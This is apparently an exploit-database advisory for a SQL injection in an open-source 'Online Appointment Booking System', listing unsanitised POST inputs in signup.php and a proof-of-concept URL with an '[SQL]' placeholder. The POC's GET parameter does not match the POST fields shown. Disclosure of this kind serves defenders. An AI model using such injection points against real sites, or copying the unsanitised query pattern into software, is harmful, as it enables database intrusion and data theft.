fcce3705a3
9 changes to exploits/shellcodes WordPress 5.2.3 - Cross-Site Host Modification Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection Enigma NMS 65.0.0 - Cross-Site Request Forgery Enigma NMS 65.0.0 - OS Command Injection Enigma NMS 65.0.0 - SQL Injection Online Appointment - SQL Injection Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting Dolibarr ERP-CRM 10.0.1 - SQL Injection
39 lines
No EOL
901 B
Text
39 lines
No EOL
901 B
Text
# Exploit Title: Online Appointment SQL Injection
|
|
# Data: 07.09.2019
|
|
# Exploit Author: mohammad zaheri
|
|
# Vendor HomagePage: https://github.com/girish03/Online-Appointment-Booking-System
|
|
# Tested on: Windows
|
|
# Google Dork: N/A
|
|
|
|
|
|
=========
|
|
Vulnerable Page:
|
|
=========
|
|
Online-Appointment-Booking-System-master/signup.php
|
|
|
|
|
|
==========
|
|
Vulnerable Source:
|
|
==========
|
|
Line 52: $name=$_POST['fname'];
|
|
Line 53: $gender=$_POST['gender'];
|
|
Line 54: $dob=$_POST['dob'];
|
|
Line 55: $contact=$_POST['contact'];
|
|
Line 56: $email=$_POST['email'];
|
|
Line 57: $username=$_POST['username'];
|
|
Line 58: $password=$_POST['pwd'];
|
|
Line 59: $prepeat=$_POST['pwdr'];
|
|
Line 62: if (mysqli_query($conn, $sql))
|
|
|
|
=========
|
|
POC:
|
|
=========
|
|
http://site.com/Online-Appointment-Booking-System-master/signup.php?sql=[SQL]
|
|
|
|
|
|
|
|
=========
|
|
Contact Me :
|
|
=========
|
|
Telegram : @m_zhrii
|
|
Email : neoboy503@gmail.com |